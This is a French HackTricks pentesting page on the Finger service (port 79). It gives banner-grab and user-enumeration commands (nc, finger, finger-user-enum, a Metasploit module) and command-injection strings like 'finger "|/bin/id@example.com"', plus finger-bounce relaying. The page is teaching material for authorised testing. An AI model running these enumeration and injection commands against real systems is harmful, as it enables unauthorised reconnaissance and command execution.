hacktricks/network-services-pentesting/pentesting-finger.md

4 KiB

79 - Pentesting Finger

{% hint style="success" %} Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks
{% endhint %}

Informations de base

Le programme/service Finger est utilisé pour récupérer des détails sur les utilisateurs d'ordinateurs. En général, les informations fournies incluent le nom d'utilisateur, le nom complet, et, dans certains cas, des détails supplémentaires. Ces détails supplémentaires peuvent comprendre l'emplacement du bureau et le numéro de téléphone (si disponible), l'heure à laquelle l'utilisateur s'est connecté, la période d'inactivité (temps d'inactivité), la dernière fois que le mail a été lu par l'utilisateur, et le contenu des fichiers de plan et de projet de l'utilisateur.

Port par défaut : 79

PORT   STATE SERVICE
79/tcp open  finger

Énumération

Capture de bannière/Connexion de base

nc -vn <IP> 79
echo "root" | nc -vn <IP> 79

Énumération des utilisateurs

finger @<Victim>       #List users
finger admin@<Victim>  #Get info of user
finger user@<Victim>   #Get info of user

Alternativement, vous pouvez utiliser finger-user-enum de pentestmonkey, quelques exemples :

finger-user-enum.pl -U users.txt -t 10.0.0.1
finger-user-enum.pl -u root -t 10.0.0.1
finger-user-enum.pl -U users.txt -T ips.txt

Nmap exécute un script pour utiliser les scripts par défaut

Metasploit utilise plus de trucs que Nmap

use auxiliary/scanner/finger/finger_users

Shodan

  • port:79 USER

Exécution de commandes

finger "|/bin/id@example.com"
finger "|/bin/ls -a /@example.com"

Finger Bounce

Utiliser un système comme relais finger

finger user@host@victim
finger @internal@external

{% hint style="success" %} Apprenez et pratiquez le Hacking AWS :HackTricks Formation Expert Red Team AWS (ARTE)
Apprenez et pratiquez le Hacking GCP : HackTricks Formation Expert Red Team GCP (GRTE)

Soutenir HackTricks
{% endhint %}